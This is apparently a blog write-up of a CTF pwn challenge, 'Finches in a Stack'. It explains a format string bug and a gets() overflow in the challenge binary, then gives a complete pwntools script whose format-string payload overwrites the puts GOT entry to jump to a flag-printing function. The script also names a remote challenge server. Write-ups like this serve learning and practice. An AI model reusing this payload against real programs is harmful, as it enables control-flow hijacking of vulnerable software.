Finches in a Stack (Unintentional Way)

Description

This challenge wasn’t suppose to be solved like this when I was discussing it with the author. To check out the intentional way, check out Finches in PIE. It is similar to this one except, PIE is enabled.

Files

fias

flag.txt (You need this in same directory as fiap for local exploit. fiap will read flag once you exploit it)

Enumuration

When you run the program, it will ask you for two inputs. And it talks about canary. I am guessing that you have to leak the canary and over ride the ret with the first input. Then fix the overwritten canary with the leaked canary.

Static Analysis

There is handy function called flag that prints out the flag

In say_hi(), we can see that the first_input can be used for format string vuln.

Second input also uses gets() so we can use it for BoF.

Solution

Looking at this problem, you can just use format string exploit to write to puts.got since after printf(&first_input) it will run puts and since we don’t return, we can go to flag function.

#!/usr/bin/python2.7
from pwn import *

isLocal = True

if isLocal:
    p = process("./fias")
else:
    p = remote("95.216.233.106", 34995)

elf = ELF("./fias")

GOT_PUTS = elf.got['puts'] # 0x804c01c
FUNC_FLAG = elf.sym['flag'] # 0x080491d2
p.recvline()
p.recvline()
#Flag addr 0x080491d2 
p.sendline(p32(GOT_PUTS+2) + '@@@@' + p32(GOT_PUTS) + '%.8x' * 4 + '%.2008x%hn' + '%.35278x%hn')

p.recvline()

p.recvline()
p.recvline()
print(p.recvline())

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s